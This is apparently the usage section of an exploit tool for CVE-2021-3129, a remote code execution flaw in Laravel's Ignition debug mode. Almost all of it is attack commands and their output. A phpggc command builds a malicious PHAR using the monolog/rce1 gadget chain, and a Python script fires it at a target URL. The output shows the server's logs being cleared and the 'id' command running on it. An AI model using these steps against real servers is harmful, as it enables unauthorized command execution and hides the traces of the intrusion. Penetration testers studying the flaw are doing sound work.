Exploit for CVE-2021-3129 Details: https://www.ambionics.io/blog/laravel-debug-rce
$ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id $ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log Logs cleared Successfully converted to PHAR ! Phar deserialized -------------------------- uid=1000(cf) gid=1000(cf) ... -------------------------- Logs cleared